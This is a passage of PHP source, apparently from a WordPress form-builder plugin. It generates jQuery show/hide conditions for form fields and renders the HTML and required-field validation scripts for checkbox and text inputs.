									$extended0 = '';
									$extended1 = '';
									$extended2 = '';
									$extended3 = '';
									$normal0 = '';
									$normal1 = '';
									$normal2 = '';
									$normal3 = '';
									
									$like_or_not = ($params_value[1] == "%" ? ">" : "==");
									$name_fields = explode(' ',$params_value[2]);
									if($name_fields[0]!='')
									{
										$extended0 = 'jQuery("#wdform_'.$params_value[0].'_element_title'.$form_id.'").val().indexOf("'.$name_fields[0].'")'.$like_or_not.'-1 ';
										$normal0 = 'jQuery("#wdform_'.$params_value[0].'_element_first'.$form_id.'").val().indexOf("'.$name_fields[0].'")'.$like_or_not.'-1 ';
									}
										
									if(isset($name_fields[1]) && $name_fields[1]!='')
									{
										$extended1 = 'jQuery("#wdform_'.$params_value[0].'_element_first'.$form_id.'").val().indexOf("'.$name_fields[1].'")'.$like_or_not.'-1 ';
										$normal1 = 'jQuery("#wdform_'.$params_value[0].'_element_last'.$form_id.'").val().indexOf("'.$name_fields[1].'")'.$like_or_not.'-1 ';
									}
									
									if(isset($name_fields[2]) && $name_fields[2]!='')
									{
										$extended2 = 'jQuery("#wdform_'.$params_value[0].'_element_last'.$form_id.'").val().indexOf("'.$name_fields[2].'")'.$like_or_not.'-1 ';
										$normal2 = '';
									}
										
									if(isset($name_fields[3]) && $name_fields[3]!='')
									{
										$extended3 = 'jQuery("#wdform_'.$params_value[0].'_element_middle'.$form_id.'").val().indexOf("'.$name_fields[3].'")'.$like_or_not.'-1 ';
										$normal3 = '';
									}
									
									
									if(isset($name_fields[3]))
									{
										$extended ='';
										$normal ='';
										if($extended0)
										{	
											$extended = $extended0;
											if($extended1)
											{
												$extended .= ' && '.$extended1;
												if($extended2)
													$extended .=' && '.$extended2;	
													
												if($extended3)
													$extended .=' && '.$extended3;
											}
											else
											{
												if($extended2)
													$extended .= ' && '.$extended2;
												if($extended3)
													$extended .= ' && '.$extended3;	
											}
										}
										else
										{
											if($extended1)
											{	
												$extended = $extended1;
												if($extended2)
													$extended .=' && '.$extended2;
													
												if($extended3)
													$extended .=' && '.$extended3;
											}
											else
											{
												if($extended2)
												{
													$extended = $extended2;
													if($extended3)
														$extended .= ' && '.$extended3;
												}
												else
													if($extended3)
														$extended = $extended3;
											}		
										}
									
										if($normal0)
										{	
											$normal = $normal0;
											if($normal1)
												$normal .= ' && '.$normal1;
										}
										else
										{
											if($normal1)
												$normal = $normal1;			
										}
									}
									else
									{
										if(isset($name_fields[2]))
										{
											$extended ="";
											$normal ="";
											if($extended0)
											{	
												$extended = $extended0;	
												if($extended1)
													$extended .= ' && '.$extended1;

												if($extended2)
														$extended .=' && '.$extended2;

											}
											else
											{
												if($extended1)
												{
													$extended = $extended1;
													if($extended2)
														$extended .= ' && '.$extended2;	
												}		
												else
													if($extended2)
														$extended = $extended2;	
											}
											
											
											if($normal0)
											{	
												$normal = $normal0;	
												if($normal1)
													$normal .= ' && '.$normal1;
											}
											else
											{
												if($normal1)
													$normal = $normal1;
											}
											
										}
										else
										{
											if(isset($name_fields[1]))
											{
												$extended ='';
												$normal ='';
												if($extended0)
												{	
													if($extended1)
														$extended = $extended0.' && '.$extended1;
													else
														$extended = $extended0;
												}
												else
												{
													if($extended1)
														$extended = $extended1;
												}
												
												
												if($normal0)
												{	
													if($normal1)
														$normal = $normal0.' && '.$normal1;
													else
														$normal = $normal0;
												}
												else
												{
													if($normal1)
														$normal = $normal1;
												}
											}
											else
											{
												$extended = $extended0;
												$normal = $normal0;
											}
										}	
									}
									
									if($extended!="" && $normal!="")			
										$if .= ' ((jQuery("#wdform_'.$params_value[0].'_element_title'.$form_id.'").length != 0 || jQuery("#wdform_'.$params_value[0].'_element_middle'.$form_id.'").length != 0) ?  '.$extended.' : '.$normal.') ';
									else
										$if .= ' true';
								}
								else
								{
									if($params_value[1] == "=" || $params_value[1] == "!")
									{
										$name_and_or = $params_value[1] == "=" ? "&&" : "||";			
										$name_empty_or_not = $params_value[1]."=";	
										$extended = ' (jQuery("#wdform_'.$params_value[0].'_element_title'.$form_id.'").val()'.$name_empty_or_not.'"" '.$name_and_or.' jQuery("#wdform_'.$params_value[0].'_element_first'.$form_id.'").val()'.$name_empty_or_not.'"" '.$name_and_or.' jQuery("#wdform_'.$params_value[0].'_element_last'.$form_id.'").val()'.$name_empty_or_not.'"" '.$name_and_or.' jQuery("#wdform_'.$params_value[0].'_element_middle'.$form_id.'").val()'.$name_empty_or_not.'"") ';		
										$normal = ' (jQuery("#wdform_'.$params_value[0].'_element_first'.$form_id.'").val()'.$name_empty_or_not.'"" '.$name_and_or.' jQuery("#wdform_'.$params_value[0].'_element_last'.$form_id.'").val()'.$name_empty_or_not.'"") ';
										
										$if .= ' ((jQuery("#wdform_'.$params_value[0].'_element_title'.$form_id.'").length != 0 || jQuery("#wdform_'.$params_value[0].'_element_middle'.$form_id.'").length != 0) ?  '.$extended.' : '.$normal.') ';
									}
									else
									{
										$extended0 = '';
										$extended1 = '';
										$extended2 = '';
										$extended3 = '';
										$normal0 = '';
										$normal1 = '';
										$normal2 = '';
										$normal3 = '';
									
										$name_fields = explode(' ',$params_value[2]);
										if($name_fields[0]!='')
										{
											$extended0 = 'jQuery("#wdform_'.$params_value[0].'_element_title'.$form_id.'").val()'.$params_value[1].'"'.$name_fields[0].'"';
											$normal0 = 'jQuery("#wdform_'.$params_value[0].'_element_first'.$form_id.'").val()'.$params_value[1].'"'.$name_fields[0].'"';
										}
										
										if(isset($name_fields[1]) && $name_fields[1]!='')
										{
											$extended1 = 'jQuery("#wdform_'.$params_value[0].'_element_first'.$form_id.'").val()'.$params_value[1].'"'.$name_fields[1].'"';
											$normal1 = 'jQuery("#wdform_'.$params_value[0].'_element_last'.$form_id.'").val()'.$params_value[1].'"'.$name_fields[1].'"';
										}
										
										if(isset($name_fields[2]) && $name_fields[2]!='')
										{
											$extended2 = 'jQuery("#wdform_'.$params_value[0].'_element_last'.$form_id.'").val()'.$params_value[1].'"'.$name_fields[2].'"';
											$normal2 = '';
										}
										
										if(isset($name_fields[3]) && $name_fields[3]!='')
										{			
											$extended3 = 'jQuery("#wdform_'.$params_value[0].'_element_middle'.$form_id.'").val()'.$params_value[1].'"'.$name_fields[3].'"';
											$normal3 = '';
										}
										
										
										if(isset($name_fields[3]))
										{
											$extended ='';
											$normal ='';
		
											if($extended0)
											{	
												$extended = $extended0;
												if($extended1)
												{
													$extended .= ' && '.$extended1;
													if($extended2)
														$extended .= ' && '.$extended2;	
														
													if($extended3)
														$extended .= ' && '.$extended3;
												}
												else
												{
													if($extended2)
														$extended .= ' && '.$extended2;
													if($extended3)
														$extended .= ' && '.$extended3;	
												}
											}
											else
											{
												if($extended1)
												{	
													$extended = $extended1;
													if($extended2)
														$extended .= ' && '.$extended2;
														
													if($extended3)
														$extended .= ' && '.$extended3;
												}
												else
												{
													if($extended2)
													{
														$extended = $extended2;
														if($extended3)
															$extended .= ' && '.$extended3;
													}
													else
														if($extended3)
															$extended = $extended3;
												}		
											}
										
											if($normal0)
											{	
												$normal = $normal0;
												if($normal1)
													$normal .= ' && '.$normal1;
											}
											else
											{
												if($normal1)
													$normal = $normal1;			
											}
										}
										else
										{
											if(isset($name_fields[2]))
											{
												$extended ="";
												$normal ="";
												if($extended0)
												{	
													$extended = $extended0;	
													if($extended1)
														$extended .= ' && '.$extended1;

													if($extended2)
															$extended .= ' && '.$extended2;

												}
												else
												{
													if($extended1)
													{
														$extended = $extended1;
														if($extended2)
															$extended .= ' && '.$extended2;	
													}		
													else
														if($extended2)
															$extended = $extended2;	
												}
												
												
												if($normal0)
												{	
													$normal = $normal0;	
													if($normal1)
														$normal .= ' && '.$normal1;
												}
												else
												{
													if($normal1)
														$normal = $normal1;
												}
												
											}
											else
											{
												if(isset($name_fields[1]))
												{
													$extended ='';
													$normal ='';
													if($extended0)
													{	
														if($extended1)
															$extended = $extended0.' && '.$extended1;
														else
															$extended = $extended0;
													}
													else
													{
														if($extended1)
															$extended = $extended1;
													}
													
													
													if($normal0)
													{	
														if($normal1)
															$normal = $normal0.' && '.$normal1;
														else
															$normal = $normal0;
													}
													else
													{
														if($normal1)
															$normal = $normal1;
													}
												}
												else
												{
													$extended = $extended0;
													$normal = $normal0;
												}
											}	
										}

										if($extended!="" && $normal!="")			
											$if .= ' ((jQuery("#wdform_'.$params_value[0].'_element_title'.$form_id.'").length != 0 || jQuery("#wdform_'.$params_value[0].'_element_middle'.$form_id.'").length != 0) ?  '.$extended.' : '.$normal.') ';
										else
											$if .= ' true';
									}	
								}
								$keyup .= '#wdform_'.$params_value[0].'_element_title'.$form_id.', #wdform_'.$params_value[0].'_element_first'.$form_id.', #wdform_'.$params_value[0].'_element_last'.$form_id.', #wdform_'.$params_value[0].'_element_middle'.$form_id.', ';		
							break;
								
							case "type_phone":
								if($params_value[1] == "==" || $params_value[1] == "!=")
								{
									$phone_fields = explode(' ',$params_value[2]);
									if(isset($phone_fields[1]))
									{
										if($phone_fields[0]!='' && $phone_fields[1]!='')
											$if .= ' (jQuery("#wdform_'.$params_value[0].'_element_first'.$form_id.'").val()'.$params_value[1].'"'.$phone_fields[0].'" && jQuery("#wdform_'.$params_value[0].'_element_last'.$form_id.'").val()'.$params_value[1].'"'.$phone_fields[1].'") ';	
										else
										{
											if($phone_fields[0]=='')
												$if .= ' (jQuery("#wdform_'.$params_value[0].'_element_last'.$form_id.'").val()'.$params_value[1].'"'.$phone_fields[1].'") ';	
											else
												if($phone_fields[1]=='')
													$if .= ' (jQuery("#wdform_'.$params_value[0].'_element_first'.$form_id.'").val()'.$params_value[1].'"'.$phone_fields[1].'") ';	
										}
									}
									else
										$if .= ' jQuery("#wdform_'.$params_value[0].'_element_first'.$form_id.'").val()'.$params_value[1].'"'.$params_value[2].'" ';
								}
								
								if($params_value[1] == "%" || $params_value[1] == "!%")
								{
									$like_or_not = ($params_value[1] == "%" ? ">" : "==");
									$phone_fields = explode(' ',$params_value[2]);
									if(isset($phone_fields[1]))
									{
										if($phone_fields[0]!='' && $phone_fields[1]!='')
											$if .= ' (jQuery("#wdform_'.$params_value[0].'_element_first'.$form_id.'").val().indexOf("'.$phone_fields[0].'")'.$like_or_not.'-1 && jQuery("#wdform_'.$params_value[0].'_element_last'.$form_id.'").val().indexOf("'.$phone_fields[1].'")'.$like_or_not.'-1)';
										else
										{
											if($phone_fields[0]=='')
												$if .= ' (jQuery("#wdform_'.$params_value[0].'_element_last'.$form_id.'").val().indexOf("'.$phone_fields[1].'")'.$like_or_not.'-1) ';	
											else
												if($phone_fields[1]=='')
													$if .= ' (jQuery("#wdform_'.$params_value[0].'_element_first'.$form_id.'").val().indexOf("'.$phone_fields[0].'")'.$like_or_not.'-1) ';															
										}
									}
									else
										$if .= ' (jQuery("#wdform_'.$params_value[0].'_element_first'.$form_id.'").val().indexOf("'.$phone_fields[0].'")'.$like_or_not.'-1) ';
								}
								
								if($params_value[1] == "=" || $params_value[1] == "!")
								{
									$params_value[2] = "";
									$and_or_phone = ($params_value[1]=="=" ? "&&" : "||");	
									$params_value[1] = $params_value[1]."=";	
									
									$if .= ' (jQuery("#wdform_'.$params_value[0].'_element_first'.$form_id.'").val()'.$params_value[1].'"'.$params_value[2].'" '.$and_or_phone.' jQuery("#wdform_'.$params_value[0].'_element_last'.$form_id.'").val()'.$params_value[1].'"'.$params_value[2].'") ';										
								}
						
							
								$keyup .= '#wdform_'.$params_value[0].'_element_first'.$form_id.', #wdform_'.$params_value[0].'_element_last'.$form_id.', ';
							break;
						
							case "type_paypal_price":	
								if($params_value[1] == "==" || $params_value[1] == "!=")
									$if .= ' (jQuery("#wdform_'.$params_value[0].'_td_name_cents").attr("style")=="display: none;" ? jQuery("#wdform_'.$params_value[0].'_element_dollars'.$form_id.'").val()'.$params_value[1].'"'.$params_value[2].'" : parseFloat(jQuery("#wdform_'.$params_value[0].'_element_dollars'.$form_id.'").val()+"."+jQuery("#wdform_'.$params_value[0].'_element_cents'.$form_id.'").val())'.$params_value[1].'parseFloat("'.str_replace('.0', '.', $params_value[2]).'"))';

								if($params_value[1] == "%" || $params_value[1] == "!%")
								{
									$like_or_not = ($params_value[1] == "%" ? ">" : "==");
									$if .= ' (jQuery("#wdform_'.$params_value[0].'_td_name_cents").attr("style")=="display: none;" ? jQuery("#wdform_'.$params_value[0].'_element_dollars'.$form_id.'").val().indexOf("'.$params_value[2].'")'.$like_or_not.'-1 : (jQuery("#wdform_'.$params_value[0].'_element_dollars'.$form_id.'").val()+"."+jQuery("#wdform_'.$params_value[0].'_element_cents'.$form_id.'").val()).indexOf("'.str_replace('.0', '.', $params_value[2]).'")'.$like_or_not.'-1) ';									
								}	
									
								if($params_value[1] == "=" || $params_value[1] == "!")
								{
									$params_value[2] = "";
									$and_or_price = ($params_value[1]=="=" ? "&&" : "||");	
									$params_value[1] = $params_value[1]."=";
									$if .= ' (jQuery("#wdform_'.$params_value[0].'_td_name_cents").attr("style")=="display: none;" ? jQuery("#wdform_'.$params_value[0].'_element_dollars'.$form_id.'").val()'.$params_value[1].'"'.$params_value[2].'" : (jQuery("#wdform_'.$params_value[0].'_element_dollars'.$form_id.'").val()'.$params_value[1].'"'.$params_value[2].'" '.$and_or_price.' jQuery("#wdform_'.$params_value[0].'_element_cents'.$form_id.'").val()'.$params_value[1].'"'.$params_value[2].'"))';										
								}
								
								$keyup .= '#wdform_'.$params_value[0].'_element_dollars'.$form_id.', #wdform_'.$params_value[0].'_element_cents'.$form_id.', ';
							break;
							
							case "type_own_select":
								if($params_value[1] == "%" || $params_value[1] == "!%")
								{
									$like_or_not = ($params_value[1] == "%" ? ">" : "==");
									$if .= ' jQuery("#wdform_'.$params_value[0].'_element'.$form_id.'").val().indexOf("'.$params_value[2].'")'.$like_or_not.'-1 ';
								}
								else
								{
									if($params_value[1] == "=" || $params_value[1] == "!")
									{
										$params_value[2] = "";
										$params_value[1] = $params_value[1]."=";						
									}
									$if .= ' jQuery("#wdform_'.$params_value[0].'_element'.$form_id.'").val()'.$params_value[1].'"'.$params_value[2].'" ';
								}
								$change .= '#wdform_'.$params_value[0].'_element'.$form_id.', ';
							break;
							
							case "type_paypal_select":
								if($params_value[1] == "%" || $params_value[1] == "!%")
								{
									$like_or_not = ($params_value[1] == "%" ? ">" : "==");
									$if .= ' jQuery("#wdform_'.$params_value[0].'_element'.$form_id.'").val().indexOf("'.$params_value[2].'")'.$like_or_not.'-1 ';
								}
								else
								{
									if($params_value[1] == "=" || $params_value[1] == "!")
									{
										$params_value[2] = "";
										$params_value[1] = $params_value[1]."=";	
										$if .= ' jQuery("#wdform_'.$params_value[0].'_element'.$form_id.'").val()'.$params_value[1].'"'.$params_value[2].'"';									
									}
									else
									{
										if ( strpos($params_value[2], '*:*value*:*') > -1 ) {
											$and_or = $params_value[1] == "==" ? '&&' : '||';
											$choise_and_value = explode("*:*value*:*", $params_value[2]);
											$params_value[2] = $choise_and_value[1];
											$params_label = $choise_and_value[0];
											$if .= ' jQuery("#wdform_'.$params_value[0].'_element'.$form_id.'").val()'.$params_value[1].'"'.$params_value[2].'" '.$and_or.' jQuery("div[wdid='.$params_value[0].'] select option:selected").text()'.$params_value[1].'"'.$params_label.'" ';
										} else {
											$if .= ' jQuery("#wdform_'.$params_value[0].'_element'.$form_id.'").val()'.$params_value[1].'"'.$params_value[2].'" ';
										}	
									}
								}
								$change .= '#wdform_'.$params_value[0].'_element'.$form_id.', ';
							break;
							case "type_address":	
								if($params_value[1] == "%" || $params_value[1] == "!%")
								{
									$like_or_not = ($params_value[1] == "%" ? ">" : "==");
									$if .= ' jQuery("#wdform_'.$params_value[0].'_country'.$form_id.'").val().indexOf("'.$params_value[2].'")'.$like_or_not.'-1 ';
								}
								else
								{
									if($params_value[1] == "=" || $params_value[1] == "!")
									{
										$params_value[2] = "";
										$params_value[1] = $params_value[1]."=";						
									}								
									$if .= ' jQuery("#wdform_'.$params_value[0].'_country'.$form_id.'").val()'.$params_value[1].'"'.$params_value[2].'" ';
								}	
								$change .= '#wdform_'.$params_value[0].'_country'.$form_id.', ';
							break;
							case "type_country":
								if($params_value[1] == "%" || $params_value[1] == "!%")
								{
									$like_or_not = ($params_value[1] == "%" ? ">" : "==");
									$if .= ' wdformjQuery("#wdform_'.$params_value[0].'_element'.$form_id.'").val().indexOf("'.$params_value[2].'")'.$like_or_not.'-1 ';
								}
								else
								{
									if($params_value[1] == "=" || $params_value[1] == "!")
									{
										$params_value[2] = "";
										$params_value[1] = $params_value[1]."=";						
									}								
									$if .= ' wdformjQuery("#wdform_'.$params_value[0].'_element'.$form_id.'").val()'.$params_value[1].'"'.$params_value[2].'" ';
								}	
								$change .= '#wdform_'.$params_value[0].'_element'.$form_id.', ';
							break;
							
							case "type_radio":
							case "type_paypal_radio":
							case "type_paypal_shipping":
								
								if($params_value[1] == "==" || $params_value[1] == "!=")
								{
									if ( strpos($params_value[2], '*:*value*:*') > -1 ) {
										$and_or = $params_value[1] == "==" ? '&&' : '||';
										$choise_and_value = explode("*:*value*:*", $params_value[2]);
										$params_value[2] = $choise_and_value[1];
										$params_label = $choise_and_value[0];
										$if .= ' jQuery("input[name^=\'wdform_'.$params_value[0].'_element'.$form_id.'\']:checked").val()'.$params_value[1].'"'.$params_value[2].'" '.$and_or.' jQuery("input[name^=\'wdform_'.$params_value[0].'_element'.$form_id.'\']:checked").attr("title")'.$params_value[1].'"'.$params_label.'" ';
									} else {
										$if .= ' jQuery("input[name^=\'wdform_'.$params_value[0].'_element'.$form_id.'\']:checked").val()'.$params_value[1].'"'.$params_value[2].'" ';
									}
			
									$click .= 'div[wdid='.$params_value[0].'] input[type=\'radio\'], ';
								}
								
								if($params_value[1] == "%" || $params_value[1] == "!%")
								{
									$click .= 'div[wdid='.$params_value[0].'] input[type=\'radio\'], ';
									$like_or_not = ($params_value[1] == "%" ? ">" : "==");
									$if .= ' (jQuery("input[name^=\'wdform_'.$params_value[0].'_element'.$form_id.'\']:checked").val() ? (jQuery("input[name^=\'wdform_'.$params_value[0].'_element'.$form_id.'\']:checked").attr("other") ? false  : (jQuery("input[name^=\'wdform_'.$params_value[0].'_element'.$form_id.'\']:checked").val().indexOf("'.$params_value[2].'")'.$like_or_not.'-1 )) : false) ';

								}
								
								if($params_value[1] == "=" || $params_value[1] == "!")
								{	
									$ckecked_or_no = ($params_value[1] == "=" ? "!" : "");
									$if .= ' '.$ckecked_or_no.'jQuery("input[name^=\'wdform_'.$params_value[0].'_element'.$form_id.'\']:checked").val()';
									$click .= 'div[wdid='.$params_value[0].'] input[type=\'radio\'], ';
								}	
								
							break;
							
							case "type_checkbox":
							case "type_paypal_checkbox":	
							if($params_value[1] == "==" || $params_value[1] == "!=")
								{
									if($params_value[2])
									{
										$choises = explode('@@@',$params_value[2]);
										$choises 	= array_slice($choises,0, count($choises)-1); 
										
										if($params_value[1]=="!=")
											$is = "!";
										else
											$is = "";
											
										foreach($choises as $key1=>$choise)
										{
											if($type_and_id[$params_value[0]]=="type_paypal_checkbox")
											{
												$choise_and_value = explode("*:*value*:*",$choise);
												$if .= ' '.$is.'(jQuery("div[wdid='.$params_value[0].'] input[value=\"'.$choise_and_value[1].'\"]").is(":checked") && jQuery("div[wdid='.$params_value[0].'] input[title=\"'.$choise_and_value[0].'\"]"))';

											}
											else
											$if .= ' '.$is.'jQuery("div[wdid='.$params_value[0].'] input[value=\"'.$choise.'\"]").is(":checked") ';
											
											if($key1!=count($choises)-1)
												$if .= '&&';
										}
									
										$click .= 'div[wdid='.$params_value[0].'] input[type=\'checkbox\'], ';
									}
									else
									{
										if($or_and=='&&')
											$if .= ' true';
										else
											$if .= ' false';
									}
								}
								
								if($params_value[1] == "%" || $params_value[1] == "!%")
								{
									$like_or_not = ($params_value[1] == "%" ? ">" : "==");
									if($params_value[2])
									{
										$choises = explode('@@@',$params_value[2]);
										$choises 	= array_slice($choises,0, count($choises)-1);

										if($type_and_id[$params_value[0]]=="type_paypal_checkbox")
										{
											foreach($choises as $key1=>$choise)
											{
										
												$choise_and_value = explode("*:*value*:*",$choise);
					
												$if .= ' jQuery("div[wdid='.$params_value[0].']  input[type=\"checkbox\"]:checked").serialize().indexOf("'.$choise_and_value[1].'")'.$like_or_not.'-1 ';
													
												if($key1!=count($choises)-1)
													$if .= '&&';			
											}																			
										}
										else
										{
											foreach($choises as $key1=>$choise)
											{
												$if .= ' jQuery("div[wdid='.$params_value[0].']  input[type=\"checkbox\"]:checked").serialize().indexOf("'.str_replace(" ","+",$choise).'")'.$like_or_not.'-1 ';
												
												if($key1!=count($choises)-1)
													$if .= '&&';
											}	
										}
									
											
											
								
										$click .= 'div[wdid='.$params_value[0].'] input[type=\'checkbox\'], ';
									}
									else
									{
										if($or_and=='&&')
											$if .= ' true';
										else
											$if .= ' false';
									}
						
								}
								
								if($params_value[1] == "=" || $params_value[1] == "!")
								{
									$ckecked_or_no = ($params_value[1] == "=" ? "==" : ">");				
									$if .= ' jQuery("div[wdid='.$params_value[0].'] input[type=\"checkbox\"]:checked").length'.$ckecked_or_no.'0 ';
									$click .= 'div[wdid='.$params_value[0].'] input[type=\'checkbox\'], ';	
									
								}

								
                             break;
						}	

						if($m!=count($cond_params)-1)
						    {
								$params_value_next = explode('***',$cond_params[$m+1]);
								if(isset($type_and_id[$params_value_next[0]]))
								$if .= $or_and;
							}
					    
					}

					if($if)
					{
						$condition_js .= '
					
							if('.$if.')
								jQuery("div[wdid='.$field_label[$k].']").'.$display .';
							else
								jQuery("div[wdid='.$field_label[$k].']").'.$display_none .';';							
					}
					
					if($keyup)
						$condition_js .= '
							jQuery("'.substr($keyup,0,-2).'").keyup(function() { 

								if('.$if.')
									jQuery("div[wdid='.$field_label[$k].']").'.$display .';
								else
									jQuery("div[wdid='.$field_label[$k].']").'.$display_none .'; });';
					
					if($change)
						$condition_js .= '
							jQuery("'.substr($change,0,-2).'").change(function() { 
								if('.$if.')
									jQuery("div[wdid='.$field_label[$k].']").'.$display .';
								else
									jQuery("div[wdid='.$field_label[$k].']").'.$display_none .'; });';
			
					if($click)
					{	
					        $condition_js .= '
							jQuery("'.substr($click,0,-2).'").click(function() { 
								if('.$if.')
									jQuery("div[wdid='.$field_label[$k].']").'.$display .';
								else
									jQuery("div[wdid='.$field_label[$k].']").'.$display_none .'; });';
		            }
			}
			
			
		}
	
	}
      
      if ($row->autogen_layout == 0) {
        $form=$row->custom_front;
      }
      else {
        $form = $row->form_front;
      }
      foreach($id1s as $id1s_key => $id1) {
        $label=$labels[$id1s_key];
        $type=$types[$id1s_key];
        $params=$paramss[$id1s_key];
        if (strpos($form, '%'.$id1.' - '.$label.'%') || strpos($form, '%'.$id1.' -'.$label.'%')) {
          $rep='';
          $required=false;
          $param=array();
          $param['attributes'] = '';
          $is_type[$type]=true;          
          switch($type) {
            case 'type_section_break': {
              $params_names=array('w_editor');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              $rep ='<div type="type_section_break" class="wdform-field-section-break"><div class="wdform_section_break">' . html_entity_decode($param['w_editor']) . '</div></div>';
              break;
            }
            case 'type_editor': {
              $params_names=array('w_editor');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              $rep ='<div type="type_editor" class="wdform-field">' . html_entity_decode($param['w_editor']) . '</div>';
              break;
            }
            case 'type_send_copy': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_first_val','w_required');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }              
              $input_active = ($param['w_first_val']=='true' ? "checked='checked'" : "");	
              $post_value = isset($_POST["counter".$form_id]) ? esc_html($_POST["counter".$form_id]) : NULL;
              if(isset($post_value)) {
                $post_temp = isset($_POST['wdform_'.$id1.'_element'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element'.$form_id])) : "";
                $input_active = (isset($post_temp) ? "checked='checked'" : "");	
              }              
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");              
              $required = ($param['w_required']=="yes" ? true : false);	              
              $rep ='<div type="type_send_copy" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label"><label for="wdform_'.$id1.'_element'.$form_id.'">'.$label.'</label></span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div>
              <div class="wdform-element-section" style="'.$param['w_field_label_pos2'].'" >
                <div class="checkbox-div" style="left:3px">
                <input type="checkbox" id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" '.$input_active.' '.$param['attributes'].'/>
                <label for="wdform_'.$id1.'_element'.$form_id.'"></label>
                </div>
              </div></div>';

              $onsubmit_js.='
              if(!jQuery("#wdform_'.$id1.'_element'.$form_id.'").is(":checked"))
                jQuery("<input type=\"hidden\" name=\"wdform_send_copy_'.$form_id.'\" value = \"1\" />").appendTo("#form'.$form_id.'");';
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(x.find(jQuery("div[wdid='.$id1.'] input:checked")).length == 0)
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    
                    return false;
                  }						
                }
                ';
              }
              break;
            }
           case 'type_text': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_first_val','w_title','w_required','w_unique');
              $temp=$params;
			  if(strpos($temp, 'w_regExp_status') > -1)
				$params_names = array('w_field_label_size','w_field_label_pos','w_size','w_first_val','w_title','w_required', 'w_regExp_status', 'w_regExp_value', 'w_regExp_common', 'w_regExp_arg', 'w_regExp_alert', 'w_unique');
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' '.$attr;
              }

              $param['w_first_val'] = (isset($_POST['wdform_'.$id1.'_element'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element'.$form_id])) : $param['w_first_val']);
          
              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? $param['w_field_label_size']+$param['w_size'] + 10 : max($param['w_field_label_size'],$param['w_size']));	
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              
              $input_active = ($param['w_first_val']==$param['w_title'] ? "input_deactive" : "input_active");	
              $required = ($param['w_required']=="yes" ? true : false);	

			  $param['w_regExp_status'] = (isset($param['w_regExp_status']) ? $param['w_regExp_status'] : "no");
			  
              $rep ='<div type="type_text" class="wdform-field" style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section" style="'.$param['w_field_label_pos2'].' width: '.$param['w_size'].'px;"  ><input type="text" class="'.$input_active.'" id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.$param['w_first_val'].'" title="'.$param['w_title'].'"  style="width: 100%;" '.$param['attributes'].'></div></div>';
              
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_element'.$form_id.'").val()=="'.$param['w_title'].'" || jQuery("#wdform_'.$id1.'_element'.$form_id.'").val()=="")
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").addClass( "form-error" );
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").focus();
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").change(function() { if( jQuery(this).val()!="" ) jQuery(this).removeClass("form-error"); else jQuery(this).addClass("form-error");});
                    return false;
                  }
                }
                ';
              }
             
			  if($param['w_regExp_status'] == 'yes') {
				$check_js .='			
					var RegExpression = "";
					var rules = unescape("'.$param["w_regExp_value"].'"); 
					("'.$param["w_regExp_arg"].'".length <= 0) ?  RegExpression = new RegExp(rules) : RegExpression = new RegExp(rules'.', "'.$param["w_regExp_arg"].'" );

					if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none") {
